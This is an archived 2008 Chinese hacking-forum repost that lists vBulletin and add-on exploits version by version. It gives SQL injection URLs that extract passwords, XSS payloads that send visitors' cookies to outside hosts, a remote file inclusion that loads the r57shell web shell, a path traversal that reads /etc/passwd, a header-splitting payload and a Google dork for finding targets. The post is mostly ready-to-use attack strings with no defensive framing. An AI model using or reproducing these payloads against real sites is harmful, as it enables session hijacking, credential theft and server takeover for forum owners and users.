【3.A.S.T】网络安全爱好者's Archiver

黑客学习

faye 发表于 2008-7-20 23:26

[转载]vBulletin Hack

[转载]vBulletin Hack
2.3.* - SQL injection
Quote:[url=http://www.strona.com/forumpath/calendar.php?s=&action=edit&eventid=14]www.strona.com/forumpath/calenda ... edit&eventid=14[/url] union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate


2.*.* - XSS
Quote:[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));

vBulletin 3.0
混世魔王:收集:vBulletin 的注入漏洞很少,国外对付VBB的办法是XSS到admin 的hash,然后用vBulletin Hash cracker2.0 破解.
3.0.0 - XSS
Quote:[url=http://www.strona.com/forumpath//search.php?do=process&showposts=0&query=]www.strona.com/forumpath//search ... wposts=0&query=[/url]<script>im g = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>

3.0-3.0.4
Quote:[url=http://www.strona.com/forumpath/forumdisplay.php?GLOBALS]www.strona.com/forumpath/forumdisplay.php?GLOBALS[/url][]=1&f=2&comma=".system

3.0.3–3.0.9 XSS
Quote:<body onLoad=img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;>

3.0.9 and 3.5.4 - XSS
Quote:[url=http://www.strona.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWY]www.strona.com/forumpath/newthre ... ect=1234&WYSIWY[/url] G_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&post hash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttim e='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4% E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3 &postpoll=yes&polloptions=1234&openclose=1&stickun stick=

1&iconid=0

vBulletin 3.5
Quote:TITLE:--------->Test<script>img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>
BODY:---------->Oboj?tnie
OTHER OPTIONS:->Oboj?tnie

3.5.3 - XSS
Quote:[url=http://www.strona.com/forumpath/profile.php?do=editpassword]www.strona.com/forumpath/profile.php?do=editpassword[/url]
pass:Twoje has?o
email: [url=http://forum.eviloctal.com/mailto:jakis@email.com]jakis@email.com[/url]”><script>img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
[url=http://www.strona.com/forumpath/sendmessage.php?do=mailmember&u=]www.strona.com/forumpath/sendmessage.php?do=mailmember&u=[/url]{your id}

3.5.4
Quote:[url=http://www.strona.com/forumpath/install/upgrade_301.php?step=SomeWord]www.strona.com/forumpath/install/upgrade_301.php?step=SomeWord[/url]

3.5.4 - XSS
Quote:[url=http://www.strona.com/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aConten]www.strona.com/forumpath/inlinem ... l=lala2%0d%0aConten[/url] t-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

Modu?y do vbulletin

vBug Tracker 3.5.1 - XSS
Quote:[url=http://www.strona.com/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbu]www.strona.com/forumpath/vbugs.p ... ug_typeid=0&vbu[/url] g_statusid=0&vbug_severityid=0&vbug_versionid=0&as signment=0&sortfield=lastedit&sortorder=%22%3Cscri pt%3Eimg= new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E

ImpEx 1.74
Quote:[url=http://www.strona.com/forumpath/impex/ImpExData.php?systempath=http://rst.void.ru/download/r57shell.txt]www.strona.com/forumpath/impex/I ... wnload/r57shell.txt[/url]
[url=http://www.strona.com/forumpath/impex/ImpExData.php?systempath=../../../../../../../../etc/passwd]www.strona.com/forumpath/impex/I ... ../../../etc/passwd[/url]

ibProArcade 2.x - SQL injection
Quote:[url=http://www.strona.com/forumpath/index.php?act=ibProArcade&module=report&user=-1]www.strona.com/forumpath/index.p ... =report&user=-1[/url] union select password from user where userid=[any_user]

google dork:
Code:
"Powered by vBulletin Version [numer_version]"

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.